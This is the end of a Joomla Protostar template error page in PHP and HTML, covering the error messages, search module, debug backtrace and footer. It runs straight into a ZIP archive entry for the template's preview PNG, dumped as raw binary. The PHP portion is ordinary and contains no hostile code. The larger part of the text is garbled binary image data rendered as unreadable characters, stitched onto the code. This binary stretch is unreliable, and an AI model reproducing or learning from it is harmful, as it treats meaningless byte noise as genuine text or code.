								<p><strong><?php echo JText::_('JERROR_LAYOUT_ERROR_HAS_OCCURRED_WHILE_PROCESSING_YOUR_REQUEST'); ?></strong></p>
								<p><?php echo JText::_('JERROR_LAYOUT_NOT_ABLE_TO_VISIT'); ?></p>
								<ul>
									<li><?php echo JText::_('JERROR_LAYOUT_AN_OUT_OF_DATE_BOOKMARK_FAVOURITE'); ?></li>
									<li><?php echo JText::_('JERROR_LAYOUT_MIS_TYPED_ADDRESS'); ?></li>
									<li><?php echo JText::_('JERROR_LAYOUT_SEARCH_ENGINE_OUT_OF_DATE_LISTING'); ?></li>
									<li><?php echo JText::_('JERROR_LAYOUT_YOU_HAVE_NO_ACCESS_TO_THIS_PAGE'); ?></li>
								</ul>
							</div>
							<div class="span6">
								<?php if ($format === 'html' && JModuleHelper::getModule('mod_search')) : ?>
									<p><strong><?php echo JText::_('JERROR_LAYOUT_SEARCH'); ?></strong></p>
									<p><?php echo JText::_('JERROR_LAYOUT_SEARCH_PAGE'); ?></p>
									<?php $module = JModuleHelper::getModule('mod_search'); ?>
									<?php echo JModuleHelper::renderModule($module); ?>
								<?php endif; ?>
								<p><?php echo JText::_('JERROR_LAYOUT_GO_TO_THE_HOME_PAGE'); ?></p>
								<p><a href="<?php echo $this->baseurl; ?>/index.php" class="btn"><span class="icon-home" aria-hidden="true"></span> <?php echo JText::_('JERROR_LAYOUT_HOME_PAGE'); ?></a></p>
							</div>
						</div>
						<hr />
						<p><?php echo JText::_('JERROR_LAYOUT_PLEASE_CONTACT_THE_SYSTEM_ADMINISTRATOR'); ?></p>
						<blockquote>
							<span class="label label-inverse"><?php echo $this->error->getCode(); ?></span> <?php echo htmlspecialchars($this->error->getMessage(), ENT_QUOTES, 'UTF-8');?>
							<?php if ($this->debug) : ?>
								<br/><?php echo htmlspecialchars($this->error->getFile(), ENT_QUOTES, 'UTF-8');?>:<?php echo $this->error->getLine(); ?>
							<?php endif; ?>
						</blockquote>
						<?php if ($this->debug) : ?>
							<div>
								<?php echo $this->renderBacktrace(); ?>
								<?php // Check if there are more Exceptions and render their data as well ?>
								<?php if ($this->error->getPrevious()) : ?>
									<?php $loop = true; ?>
									<?php // Reference $this->_error here and in the loop as setError() assigns errors to this property and we need this for the backtrace to work correctly ?>
									<?php // Make the first assignment to setError() outside the loop so the loop does not skip Exceptions ?>
									<?php $this->setError($this->_error->getPrevious()); ?>
									<?php while ($loop === true) : ?>
										<p><strong><?php echo JText::_('JERROR_LAYOUT_PREVIOUS_ERROR'); ?></strong></p>
										<p>
											<?php echo htmlspecialchars($this->_error->getMessage(), ENT_QUOTES, 'UTF-8'); ?>
											<br/><?php echo htmlspecialchars($this->_error->getFile(), ENT_QUOTES, 'UTF-8');?>:<?php echo $this->_error->getLine(); ?>
										</p>
										<?php echo $this->renderBacktrace(); ?>
										<?php $loop = $this->setError($this->_error->getPrevious()); ?>
									<?php endwhile; ?>
									<?php // Reset the main error object to the base error ?>
									<?php $this->setError($this->error); ?>
								<?php endif; ?>
							</div>
						<?php endif; ?>
					</div>
					<!-- End Content -->
				</main>
			</div>
		</div>
	</div>
	<!-- Footer -->
	<footer class="footer" role="contentinfo">
		<div class="container<?php echo ($params->get('fluidContainer') ? '-fluid' : ''); ?>">
			<hr />
			<?php if ($format === 'html') : ?>
				<?php echo $this->loadRenderer('modules')->render('footer', array('style' => 'none')); ?>
			<?php endif; ?>
			<p class="pull-right">
				<a href="#top" id="back-top">
					<?php echo JText::_('TPL_PROTOSTAR_BACKTOTOP'); ?>
				</a>
			</p>
			<p>
				&copy; <?php echo date('Y'); ?> <?php echo $sitename; ?>
			</p>
		</div>
	</footer>
	<?php if ($format === 'html') : ?>
		<?php echo $this->loadRenderer('modules')->render('debug', array('style' => 'none')); ?>
	<?php endif; ?>
</body>
</html>
PK՜�\�ş����protostar/template_preview.pngnu�[����PNG


IHDR��)����IDATx���,�D��,m8�r��o$?��ێ�� b�~I${@9$��1��O@�Sr!ל�ؗ�r�	Z%���$�T$�(�~����u���m�LE'�vAv�.�9~5WA�pn��g�|���%º޼jx�ӫ�����?�/�ԅ+yAH �t�;Dr7���+j��>�;-EB�;�u���=AIj2c)t���ү^(�J�W�b�sȫPIB.t+�!6M�z���;�H�B�<G2���Ô䞷,�ʏ�||��?�+lx���t.�&�,RPu��Iz]j����@.U�T&�4��}�a�J2��Z�FRd��r}�Ƿy�-�o��.���2��蒍�
��<\_�$�"��U\��U+���9�IQ٤�����G�y�V�v��+I5`�\��ա7�=�������9�2���q-!ӷ��
�ҩɀs��,�FfgP>��Y}Q�d١��7�l$�y��n]���T��p�m��Ȅ	�t���K�bS��3�`�q4�Ig���f�<1�Nn�w�$�I�R���ְ�=�C��hi�R�n�#����Q������6��@�X6���{0�4E]@�"{�<�K�s��8���94H8�GjJ3�t�Bx�����1v)��3Ͽ���	SCfF@KgW�(Ip�"� ^h!M�F�g
B�ʠ͎�����J)�7���(t��(��|�]����N��&ϙ���_.� F��+���\�$�
�U5Ca���f:0Iеt����c�mJ�ž�$�(,�RN	������7�N;3w���� Sf�9�*Eb��T�����>���=��ҫ$���a���t��A?ȝ�d��
����� �H����X��Ь���m�u	,�.�2��g�b?�gV�An��WI�7�Xt	�쪪�M�;Q�L�Sf�f8�Ѱ�G��N�4%|k߮��rrM<��9)�-q�
f��u*$Z�MhvZ�!�k}$$�!7%@�#�BH�Ӧ���Ƿ������6k�3�rk��g0[_33lUN��}䗋���:jU_��E(:��vE۠(������D���r�P:�0Ȕ�fN:��\`�I
��@QINy�Ms9�p�q�H�rҺ�;�h�LP�Tu'�:[ˉ��#p;GV��ma��Ȑ����[sM�p}��O�DE�0�������L���j\!tTX@@\�.5�sھ��
'jn�{w2=�j��k�;irJ���E�r���&�]5��v�P&�̏�wS6�����q��>�W�F{��/W�l�U���뢈�Ng�t=��M6F�uAh��[��-�q����>��^���Ù�����0���)U6c�grpuNUR,���oMT4�I^��[���:�O�����K}P'sQ�(�ڱ�.��>����%�F$jA{/�1����P���Y��#l���g*g�O#:5��YI�S`��P	��;��^�VY�Ci��_jx�_A\5ͫ��l���晔LZ�G�'�T�t�5!^�S���?�������Һ�ϘtTU
}���̳C7e����E��^K�^��2ha|OXHl]�E�n,}n+�/r�*�,�UXD6����vPɼU�{5M=iořg��U�P8�Cڊx��;w*"�"m����Tf�ިnD�-3��}�L���"�
�ZJ�~胄Zw~�ZZ���n�m܆_V@��n�n*��W[q[��e��
����K���J�}-��ȍL���Jo�&�HdCi�t�`��\ڙ�B����؆�> �Bu)(Z$����?xF	��)�
($�Gj�����J���;��r�.�'w*�L8Tt��¸�X�P�٩�#g�� �4�QP��[&��oM�U2�R @6l*�po2
�B�B3#+���|�և�5��1|h�*���90}�{~�!���z�J�'��=����.�뫵ٯ{�>||
�B5o*R$��9-)�;��腃^!�M�y%I�I8>d�x�P]���jwW��X�;�����a��
���
*�@(8���`��JF"�U�bJ�I�"�V*�}Ǿ
���6����a�M)h:��!
6f,Ckznu|�5|
*F��d%!���Ţ���H�#x<�������.������ɦ��	���5�\A϶��_Hx�ي�y9�N�9���X@87�N��sB.�%�)j�::%��uǻ���}���tw�%N�b3r̒4n��6�@3zNbj�Jʋ:a��#�0���f��!�KT�e2������h]�F#_֦�������H7T��KΏ��������7��Q���9h���|W�����#mD;�֢݊C �cq}��%��$52L����?�L�F���VWh�P�b���țT�(&`Y��w��rХ,�F�7����|0#�J�Z�*˃o�
v`��&�T4�P��o������¾L���xY��b�������������>eg��$��Ĭ�#�C�9�9)�H��ܩ�ނ�j��m��N�	�L"i�钎�r��T3h�Gٱ�ǜɒ�,Y�Q �Ԡ9>!gȧ=��8�9u��r���8=�j��s�����������Q�Q�}�����_Wd���f�����3�B��T�җ��<?VQbB)�ݧH$��	[��J4U]��zձ+���pӦ�M[�����G]8Q���e��d|��ƪ@���{Z�'���n�%=L{;�嚜+z�m���53��
�I>�"��g��z��GR_H�W��!i•��b��e�z��.�m������U�(�N�t�a/�f�Zs}h��CW+a�^����5̍(_a}1��Tjd�X1��3L]#��Gt���TɈ�`��_�+>��M���ֿ�����m*���<�/�r�&�����ڙ�A��M���}�dkd�����	�M	y�9����"4�`�f9Hd�-'/V_���+V$��Ul������ݛ:��x�t%�~�bn�kA-���uI�xR���R@՝�}��M#��uS���C�n�)J��S�N�x�>"�E4�C�_*-��Ǫ�Iݶ���՗���f.���'��٣��l�;���>'��\�,�P٣�t��w]���J R�Re�6"�?�O���D��Iys݋]�I�=<���9�ɫ�ћ���#Y�9�)Ǵݓ&�i�u����j�g��1}r!�^�������,�w?���:)��q�e����kR�b�7�����YI�>r��C�lf��<h���G�N�z������ҧ��G9x+* �H�ԁW����:
��'_=��+�s0��A^)I��at\�=A�B���?�I����+�e�A�K2k.��<�}Y��uy�!�%�3SJ�Da�ь�/wD��<4I{����Z|�_]�ޥ�/�@�b��i���HN�Y�1k�H�\��\�g/�g�*_�0���\��3�ի�gث�M2�{�o��t}�t���Z�$k����-���қ6�G�
�Yh�7����R�;���F8Ӊ��3��a�#��W!����(\�>�W\���A`ٕa���F���~�o;#�2�����
���$�K7"_<ת�P�k�<X@�8n�W�c��Z>�T��Z
�)�L 	�Gx�£�`�"�3�݊��P�"�Y1\.s��b|�Jõ�گ��Rۛ�� `�v��]M+��"̉��饡&����u���5�"�%��95�|@u��z�T��C���`�=%��_��jl�<��:��|j���h�e�\̐r��{3� F��ԇG�kM]�����H
�1yx�O�W~-Sֽ���2���!�k��gt���]`��;pS�WN���U�4���Q�������Z1��������2&�-�4<��M���yfى�I�h4�g�:Q׍�%��It���>�U��$ι�u&CR�d}k4��KX���{^~b�'�
�_���p;�b�멸�+�P���c0�u2\��J��]����DI��!�U������B���m���,]r�zIy�V�ZG���r8��݊�]J}`���K�9ݸ42*���t�ϫpqW�ᔼ�Tk�0�g
>=��6ճò���>���)g���c?��\$QV���c�vU+GD�9�ſi�e���@�O�m��1Hi�"Q̤Cky
)Y�彟�`Ͽ�y���fo����*k�|��Z��p��1$�Q���ynK��
���+�����
�B�pZ4��N�E-�=b̫Km����܎+�u�MH�PQliCZ��}�=Z�!'�;�E�ʆew�SB�:j�+�⁂��Q�i�%�f�~�G��L������7��a�4E$
��VqAX�p3�QA�$_��6��k@`��[�m_��g���/A���R:���(��}��ԕ(��u�v�
J%U&sF^�q�Oe�t>�����<O���n�V6�V%y��8I㰣Hx�D�;"��+W�UU��O��F)w5j(��׹��>yY�+vg۵�[��e�Y��� � �#6��5�OyH�iHy>�}&5�U�J�\�R�Ôޙ>#K�A9&򱎼�9k@X��� ��|p[3�K�4`�8��_yO����� ��E4~^�vg�r�t��=vM]���$�z��U�F>�g���u{
X�2�㚩����r���1�4�z��L0��^����+gK�6S9O�E
R�SN�1\�ep��u��Z��8iܼ��8�g��v;�n_��H��v�;�A{�'Ar���[����z%�)��.����|<ZNj
j_6��T�dWޤ��fl�5�Cn�;%�ru��lƃ�.�޹:̪����3�MW�T@>��N���k)�rξ�(�/��5�Pm�I\t���٦�{9Z�v�`�k$�Q{�ٖ�΄#��@΍�F�����Y�L��e�n,�)�s��U�!Ku���\�KQ�����X�O#]3�;�kL�kf��(���2��?�ϫ5�z�>��O����O��C��a����FRd-�A�%ɐBHL��G�R!7"u/�$�hjʟ$��n�㩾\8=�}E��}OC�m��ݷ4�w�0�|Cnp�U��[��%��:I�E�<r��^�(�$���AUF�J�Bo:��~x�E�{��aɒ�]\�[C"�eI�B5�xs�-;�4�<Yx���a��LS�D(�}��Q>�QO���k^r[��6b3
'gj��c��o�R��/��H��bw��R{#���[����U�9�c]]�qA�j�����y�����e���y��i���yw��k�� �Ķ��X�󩮝;�2����}#���mYki���,��W����}U��v;~a�[>f��ޭ,�X.��������%mZ��?�n�1�DQ�LN�("�����2���56��1��I{Y�C`m���d����t{�j�f�0ұ#��r����Ao��{���V�U
?B=!���ot���Ea�[�������(���X�$�<�(��rYn��`����F����m�fw
|n~א���\cxr��oo���^���v�����Ƙ�?��{,*�y���/��b]�ge���Z��˹/�]asxbJ9��Nv���C�Djyy��(I~��/���M�o��GN��^O����K�����1Eɉw~��Ǥ��K��n�韾�I��<�6w8箽��Aѣ]kX���&*��RH�4ɺ�򾁶la,m�g�'��l@��a���Zk4�Ea"{�rb�8{ �#��V`����C��`�7�ǭ��qn���M;�����Z���TE�#k���<m�1�2�`�SQv
�`���!/���]R�7�k�j�\��d�v�Ȯ�v�2N��j���k�(&����S��^�pu@eնw����_��םN��O��mns]�۳��)����T~�L���|Z���ګ\�2R��*�,V7L��iJDɚ�o?�����!Ox�տ��/��{���ژ8��?����G�������c߽~�fk��={>��w���=s�/~��Kw�ͽ{YWXq
Uӄ�h�ܟ-����o^I�
�#A��a���
��30M����b`��U;����j<���٫-����W`�/�D���y�3����=�1w�z��͛69���L�&�~�5�fb,޳kך��ͭ����"��\y�����	�!d�5��%Gf��!@l �9{�k40W���:A�[����՟�!*�#�=߈��O�4�㩩���~��ȅ��OM�)/~}#�*��.�e��ކ��Y�ȭ�19g�,�Q�]�$���Ò8���wf����ʙc�N
-\�����>�&m��UW�ez�Cc�.�zarl���[��co����zw�L���|>���Ϊ ��6��:Im4�ͫj%2��R�#��
K.#����x�Er�T�u���dA���/�'�;L�l�ث=A�\�"ӟ��O����h�q��W�v-y��Io���ܩ(�IϞt��k�~��u����<(�u�ŕUo�ju��H��W-gؚP�v�=�,����FV���2*�j�c�	�R���xW�i�V�d���C�z��I?�siiibb����ڵ+I���>:˲^���Z�tq��Z�	?���>���a�e%��:�����w#�K��mg���u�j��2�h�N8Am۶��}K���]E6�^��ۨ6lP�?v�LOv�ˑ5��5�n�ɩIj�n_M��z�K��B������${]mB�P5K<l1d�[��<A8\���|Ʉ�k���\�
ʭ�%��J�j�#+w{�L1��\��Q_i�h�ݦ�5��>�}�����ͩ������^���O;��ˮ�����x������Rl3��d={��VS��?��uT��]����r�[Y�2{�k���k��]���.�7�k��k0[���U�%�I�l۶mnnn~~��#�������t���eeg�u��o�ȑ��E�*z0j�^���Q�
ɒ���%�p�-�[�y��q>�1t����Kg����59}H��Q�;1s�Kv��i:�Ϝ\����܆�-3{N;p墚����n��wr�1焪�8��Zg�*\ɫ^6`���ȶ�;G/&����&���7<�d����z�|�ux�����p��\dD����jz������;jMަ_��w�9��V�3���ZgS31>u���r��s�g7g���:E�	��a�K�=�P.���"RfO�W��Y����]2!fy�12{@ؐ=�PB��n9���W���p�����۷o�������޽{�</O���@�`g� KR������S��s��њ���S�p��8
_��ԑ��?��W�3��ǣ4�K�&S��Y��2klE�Ff���D3�kr��)���Kǣ�Z���O���i�^�����U_u
Yĩ�y�
���X�6j���ˤ2�{�:�P�3Ia͠�=�T��	���\9���[��WmO���}^�G�$�,MI�Ik0J?�Ǔ�q��&��<��HS�i?�m�ڰ��̃G1�G�y���=.�P�2���h8�p�Z�h6���Cc���u�;dxB��q�Z�˳^a�F,�r�8>x��;�sk׮���Ͳ̻��_�kw,�(t`S�[�شV�~vD%t���D�H��[�'���wx�����g49��C�x)2���83Y���Q��[���5�5y�9n��j�E:�=�&]�%�&mWF�)�^�PO��ߠ�r��?/g���v���^L�f�v8�Qc��-kr�CZ����v��C�Ŋ������#����ʀ��E�L3d�Kb����Ez��y[��Ğ��6`ʵݲgF�r+[0x2�+�A=�yy>4�۞=����hV��"{�Y��ԑvЕA��Ε�W�LJr�������l�c�(�5lq�a�UB^`�
*�ڞ�%{��c��
gO����=��8�U�E�@�6�c�e��1x��a���s�XT��¸��Ԅ�x��'�s\�,��!A�^�`���a�A���Y���`)6�]C)߿�7��K��P�-���k�s�p����xbbB�J�i��}�#�/}��v,��b���	���)|�R�t����Ŋ��ܱ�����3�"�s.�7�#�g�v��q�wAс�Ap!Rl#=��ߓ�c��Œ�������"�͕���U�P�۝}z��	lЉ.M�4"/�=�r�j~��G5����,k���5�q��ϳ7����?���H��}��Bx�=����;p�B���G���xH�:�
�d
,�����7;�@I��q{ʒ�N�𔵼�p_]a/��˄JPn�oO��������/���.�l��Ez���6�%@�=@
�F�)�_Q���5���%"�j咿��y@^��VU*ګG��^Ɉ^W�9{�wX�}>����8EA��r(����|��=��!�=����p/��Gkx.�c*M��ve�@�]R���Y֏�0x����c�룗	�[�R/��%��<�q{�G�j�M�^^xK��X&�0�,'�+S�A4�m���#߽r*�˻�
�Z����#}Y���暮~���:���d�%��=�U����N���Ksx�r��`���@���!t�����p�7�r�0bc����m�=N�M�q�ZgI�ǵ&�C��ٌ=�	�ٍ���H�x�e���]
!�P�e�Fs
f{@>�k��8-Q���"{��$�+��ƻ:vV��8�T�ҋNt:�"�Wo����>�����e��Sl�Ifl��i��4m�L��!���4�1�1�-�X'��n|�6�Y��o��*��ofg�d}�y����\�LnU��a@���&�̌*mI�p�)�}l_���QO.g�թ�Β�LЊ�羼Y9�[�<�QR�x{�������]|y��;�?���1�n�OC<��OC�s�p[@b�0p�\i��J��.T*��lB��UP��2��BTb�2�1�CH�}�b�{�….\��E��$bg+�)�5P�x� ��-a'ם�R�fX�dTC�,o�Z�`�f$f��<.\�p�b7�5��}!c�L�R�Zdn�*�!"�[��%���9f�,^E��].\�p���B�č��@�Yn+/�r�̉P���Y䊰�! ��0$�}]�p����$ȩD���^9;K56EO��mK��+H��=DBj.\�p�bw�-��N��65�J�*�l�(�������~�;Q��yr�….v/�� j#���Sa�1)ͤ�h)N'*Q��X�v����'���ڮ�C܅.v ���M��4���q)�3qPBA���RN�C�J��>a�VU�Sj��u%�h.��@$�\�p�B����.��z�"�3W�<���-����?%RQ�=��囊�[4��|F���h�f*������.\�p�H��X t��ʬ[����(k��*�.�I���I���p*�
��P��.p�…��_U]-J��8�0Q0��l ˲�4�o6)�7��")����5ۥ�M��L�\ �"HV��(�W��p�1��.\�p��#]���֘�P��Q
~ //���Q��r�i1�6�aX�[mQ����h$3�H$�{<'�rj۬Ѧɪ�/ؤ�6JD��E�P��ؗ
�gUJ�,�!:��.\lڴ������mjjJ$��D���F�х�����ՋMK��HT���
-�L8/>���֯0`@aa{
M���b��$4c��	o[���2
�B�ͬZ�r�I�e�����۷o�6�0C|�t�"����ԺԱ%��� uPBp�2o�p�…�ŋ/_������d�T|i�il3c)�z�l�w�}wذaݺuc����G�p/3�ʙ؝#���߿"�X�v�Z"�ن+���}��ٴqC*�Z�|Y<g��ݻ�`�
��mwiQf�N� SцAc�9��v�����….#v���̙3,X�����C��
b��`���d���x��xࠁ��8fgȜ��L������P ���T���O��0�@����e�/s�t��u�С;vlU�@���D�[˩��j%�M�b�❸p�…�}g̘1k�,�0�JڥK������ƕ+W�X�bժUUUUM��D<��U&�ȥ��RH&S�7m�y���>�²Lg
35�!�AQ`� d�o,:fdl4e�L�%d)Q� }E:%��U<��?�3��������¢��{��Փ)�{a7nd���}ڽg�F�Ǭӿ��h�W����;B����̾6+���,'�v�…����4(��\ǎ�~��ӧWϞL=�7o�w�}?i��իV3� MӁj6�3rE���
N�R�~���m����Ky��4ʉ�enU)L�FܚZ�/#���ję]R��$"�J��ĭ�!/���
:u�4l��c�9z���g_�֯_�lٲw�yg�}��s�0UXМhg,ϼ!?�x����̨;s�x�*ӫ*�h�p���Mk;�)��BZ
o"�+HAGh׋�p�b�c_�i1O�~���[p@Iq�3_}���&$��v�AM�@)%2�@AC 'SR����_fy�a������eTW��.�[���-����.�z*��Ʉ�hY�t��k��/�ѯ_���?�Od��K�N�4�����#�s�h?�
ʩ���@���tg�U:-�p$��e���C?,~'�j��1�ړ�^Ѫ�3��	O�h
��3��F�N\�p���S�N�8qb߾}�/�v�����{tav�ԥ��H�t.�i�\�r�`_%��R}uP�2U�|�\�'ӳM���mT9�3*��H�"w��]���J���ȷ���9䆕�(���y��D(/�H,]�䞻���o��F�
3�9s��N<��(��>�A���:)��wNp�ł��e4�ZQ��a�^�v�/�&�����_�KRQ,%8�9k�d'�.�2�?~<�b�V����Ә1o���4����5��V�l����t(���o�~�N�y.18е��!/��\H�GA���K�$8�
pa1P��	��T 
��d*iY���-.-��k&�K/��g�-//5jTSc�|`���)K�:1P�ԛQ��H�hۧ
@���p�ܶC�L�[�q��T�:�j>�'�'?���3�3u��I#!��a�5�=�X�_�~~�x��$��!�B\�%A��h�7U����Ŏ�˾\Ob���g��ӧOﯿ���+��r��>}���gb�ip�NJ���{*�."1�)ed�Lr�Q�j��[+�lY^���HZVxU�=:H<��À�|؟�F0(�!�pp抲�˿��-����!£�>r��w��#G&�/>���sa�ֵ���Еo2�Z,QXP�[e�;_u�hfR�	xB+��>�_�����|�'�y�O͒�^5_:��.�����?p�T�˳9Q�I����|s�^x���6l�&.\�H ��ik֬7n�<����/����o"���7�����ʺ��v��\f%"�,b������@�n*�4 ��~$�T�0B$�+�2���N��וmq��h�*T��j�~"����/(��{�w1>|x����~�I$�$�-�2▕�pR�3�:A��juFi$ʝ�S�p���;�ɯϗ�u�-�d�Zz7W��EUs~\��>+��'H�B횉�j�%H��I���;KVV,\�b���t,#;=f�[���������=�{��3�?`�e���VR\�`�N�ۑ��…P�Z��J���ꫲ��~��M�2宻��u��L�3R�V����щ�2����&#:շ tP��*d��.�eǰU�F�9�W@
hrZf�<�Ґ_�X�?
_|�yQqѝ��>x��ٳgw�ؑm��e��ZI���فĒ���t�L��t$Q��b�2
;�S��g��˰.5&�EO,���>=P۴�3oL��I�Y�eD�H���P�������k_KZ�1�|w�)W�4u6���scN�����5$'0�}���&Ϛ�,�*+-�TY[�"9��扳aÆM-���2���>c��{����'e�]��@$('�J_D;�d�a�0oi*/�~�D��;�{�t�.A�e;Zm�u�+�!�4��]���EV	bne�f5�0���#Z~�������^�4�N��H$�J0�[r6"�-�fZ��eV/�/P�Ru�x��>�q�F?��������ٜ�.�����8g������/�Z���[F �)�	=�.�{,6VZ_ރ��K�F���?��>�
�>RT�zȮ���k����xHq�G�P�k/:u��y�H\��v���;wvp��Zc�͛73�
�w�s�ڵ���A,RX(J|%�Ld�Edz���l#�L�%�AaLq�z34*4V;�eM֡�N">�j�=1Ȟ�`#QUWҜ%�Q@Z+o+�.��
Mð�mo)��"S��#�<���{3��p�M�zȡ��?n*d�D{�J��+f�T���LH탅�|���MV��Gx4_Y^�7�di��E���<�ۅ:�Sc���s��#�A�^�׹Ik(��C���+	�-b��c_�}w�=��Zl�eg�ᰣڛ�.��:���L�6����d��=�,�ܵ���K���v*�
"�P)U�e2�B@�7�R�S
�d�P�"s,
q�ףʵ�ޮ$�geW�(����l( Rya��������
�G����Ų�K�)7_"�.�k�:�7�%!��*vp1�AK�V��Ua(֟�Wn-�
���RM�^�cNx��H��k�{\Z3zB��ƧL��4�`�$�@\�p��!�9,�5����_^�V�a&芊
f�L&�����(**�>>Ne�D!�sIģV���<���4R�G�'�9
���nCW{T�F�
T��U{~.�'�$����B��&�Jbv�2�@���7cDz}�ՊR`.!�,';T��0	���;�I��6��/4���C�]t-�KA�4oe��L��q�I���)�P~Mս���"�\�2��G����Hi�}��p���|~��O����k�~���?��h9iU��}3���x�_b���{��ɳɤ�1�͏�~��O
����#/^r󿮻����te�!���K�]y�/��_w?����L�����|��/o�w���^sףO���"i<���O��!q�b��iӒ��:d�y�V�TO�4�1��\�b„���ď?|��xX^�	&���/;uQ�F�3-�,�IH��Ei���IZn(�H|G6��Z�S3��jl�*�����T�V7�Qy*�m�vږ=�QV3�
Ys����'�����ey�W�Z�L&y�-'�8��m�o�wj4���5�H,�bZ;@��\�
#�ک�W"�{��z��M��^�hA��߯�{�wpO�L@(��D�ŗ�����{�����f��\1q�ܣ/���.�ۃOO�>������nʬy7=���'\��Kn�>w�P]�����Ϲ�����b���چ�KW1�;�;����K22�o���O��қ��Ӵ_��䊊��x�a��O��������|�3o|���.M��0㼿<0�?�vɆ��,<��[F���k�z짩�6l���3O�G���)W�p�_�8���{捏�;�Ž��\�dE����>}�;o�?wɲ������_��Uѡ�~���Tӂ�<�4�	�@��dξ
P�,ݔ�V����KHj�òwI�kP��!]i����V�@�i���ά/�*�e�`q�x|�&MZ�r+3���W�^ͷ$�
�ᖢ@�#J����su��b2��Z�^g�y.u�#?]e�� ����k_�O�`�#���L�t�ˊ|�YR�����,����+s�X}n�gW�ﲲ҇o����ٵ�X�v�G_Ox��:��W��ܓ�b��WT�v���/�����j��噚;nڜ�>��W�=��9/?|�ǣ�,_���Qþz��>=�d$��|�F��[��54���[��,&i�_��;=��[�{��#)����Ɲw�}�[�:��ط�`su�?L���Wϸ�n��[RT@\��ah��'�������т�{���]��).��� ��E1+���3�����3�D���}�d�B�ٵH>�zU䎴��L�bZ�U�2f�W��Z O��d+2!e�T%- Er��^U�a;�[B� s?S��`8\7i��/�0���`)V$e�B�!���/UDZ[�ia�������l:.���1�����O������ژ%�}>pOz2I<�sO��N��Ւ@�k�~>�w:)�H�y��+����}{L��/=���;��gO|��v%EW�0�q�[��p�����G��{���,�礣�����]p�?x���Sy�w���1��$���O9f���t�y'%ؗap�^�>uoaA�ӯ�N��KƩ,��;e��^������@�v%�����z�{���.v�:t/��9�=�?��,�t�A���սS����

�Ν�b������5���#$Y�Z1�tCAf��`�\�:���%C(�J�)�9@>S��Q^�42å;�o$�@��
!��uPMc
���0���V�a�	��ږ�Z�V�2;�D)�/Ĕ��648�xꧥ��/���wM\�P8n����� �_F�&�?<7�`���/ֿ�F��c��?_���=���m���wF$z�_/�խQ ��k.���?�~r"��<q�O<���DZ��i�~�7?M{��o.8�hWZ���fJ�ԇ(�PV:h@��kֳ�F)���˟�VV�z�UG4���>=�<���O��ą�	��}�8�ޫ9'C�Gsx�
��^�g��i�i"*��@��=OISiQ�5J��l2
����"���&&S��b�l�[�BQU-ٲ,�����R\�z�W��N�B��x����`��
MMMR
E��-�C��rř���˒v��T'��I�5������?{��ǿ�>��_� yz��|���x�8�����l����:�:����A�js���CZ�SDb�KW��J��I���n��^�~3I$5�8�%�:�/�f��]3M�0L� e�?SQ����eUl�"�y1��䐲�R>����?'�I�0XR,g&h�?�u�جP"�P>C5��.!�N�g�wy�`P�%�6d��-?���3���*%^Ѱ�[
�*H�W�JU����z���u��=
yt�1�V�b�m۽m>H��[�L*�� �:��Eb-�G����_�m���f�\�����I4X�!�V�?�3��u]Aq�ԧ�W�ᆵ����
�f�6�V#�]g6^�ۓ�ś"1���K#��B`suq�[���z5�"��J�t�{�i5��j�_0��&S)RW�'��
0Ұ�03`���ȶc�K��(�>��%;�h
��4C�r���ǘ�g�,��͙�4��.s��J\�CJ�P!ĒU���X��śf3,%і�.*�w�u=�n���l����
��
$��o�P�j+b(��)�
Qсo9g}����7���� I�̾��ۧ�a}/9��qc�_���?��������W�ׯ,�^�'Bi�Q#���۔9�ҿׁ{1���{��>���R{��g�ཱྀ��>��yN9�3g�ys�3l�n��'Si���~{
&��֧�G�Y_7�7������;�;l�0���vC�4��[]]�9x�+f�x<���t��n�u`bY�DՉ(��dBu`�MY$bkW���6���|cY�Ui�13b+b�T AeqҍE��dY���E���E�)�#MM�ײ�x<N�*�'�A8�[�X�	�&���tK�5 } !(9jYV��?�u�Q.�n����hˆ��iO~��Ǽ5f�>��XXP�m�$B�y_�y�:B�������PRBZ�H��؉�2A��R�4􀽞x�G����]��<��ky�a�sP��қ�<w�/O�춥�֒l�d�ċ�����r�l�ִL��Db��;�䓏��ñW�p}���������zt=���w\s��v�b���F�o߾<���R��eY�T
(U�p�ECJɀ�)��%I�F���S��A	UUѱGʜ�-	eV��8Qv�����̠��&
�E@��)y�d��$��h��٪�/�A)�RF	�|�vMTh�B�F���AW�_��~%��Q�#A3�/���VV��Z�O��tcC�ʷ���!)���K�F�ɂ�?�9�g�SN77ll��à�D���_�p�o��$�/�r�O�٣�ȡ���y�2���ُ?�v��}�U���=t��y�]���ޗ�zS[�ە!��jY�1�v��N;���oelJ���K�G_x�,0��Fu��>��64.^����Oc'v���G�<x�a�ԓ�"�
�4I2eY�/�ղ���gI��}�?������隆s�Q�3��ky�zuM=K$���?̞5o���d*�L��k�x���7b��O�_�$m.�o�""���${��R��QLb�9/P5����,2Bۡ&��u��D����;+���*k������d%\[~h!.ֈ�d �f�k����!=����$�?Ka�@��@޴���[PN�oC'*�bb���Q
-�X��-�}?-�|�c�'�^D
xޛ�z삍�e5�S��Fƾ�%�!��Ϛe��^����aB(��b_|�q|�{c����$���ȼ��f�K�1E6�4�78��c��%�zv�b��v���'����z��5���@*e���F~��N?�P"�^z�?��'_�0��O���&5B����7^v�	�EL�BR^�Ou-�&�w..�d����䇼���w(��H�*�[O�{��??����ꉗ��x<h�_�G����#κ^�T௬�X�fm	�!;.\J̐Ů Ε�u��n���T+�E	�Q8XY�lA���ө9A�����|���2��HP��Yd�T�Z�+��E�_C�+�y�V��[�^� f&��x���*�ϟ�{�p�օ�~Kr�}#B4ɖ{d�a!>�D�,,�[�M���7aZ@{��’�O��2�3�m��;w��Q�u�K۵�jjÏ=��o_��}�(v���2��:��Ӆ)��DKj��������7l�
�J�…$�
��?nb
�MU,<����]qa��v];���X�����XC�e\sѩ����P6�����?��[����K��G�;�Ml�LS���̜޹C;�^.�����୧�w�,Ϊ�(���p��3���E�QI�0*���#*�	S�`�__Y3S`+�ן�
"s�J�VL��1H��Y�쀄�Y1'0ށ�sLb#��[�y[]E���bLh�c_˲d^W��I�1�u�s6��VL'XˤUA�8���Nڢ>�.�V��F�Z��e��s3?��.0w�:O�cI�3�0̘A�h:=�oٓ��%���x�z֬X�������ƚ�����
����o��-;��M!�5d���p�	
�C��AZ���P�Oء�yq�CN�!Эs�f�G�Lv\��EQ�NoM�`OH�F��4�
�J�I#Q^X2��Ś,Ӡ���?�QF���^H,����ġ
�IJ9��q������U
�Tyd��`��+��b
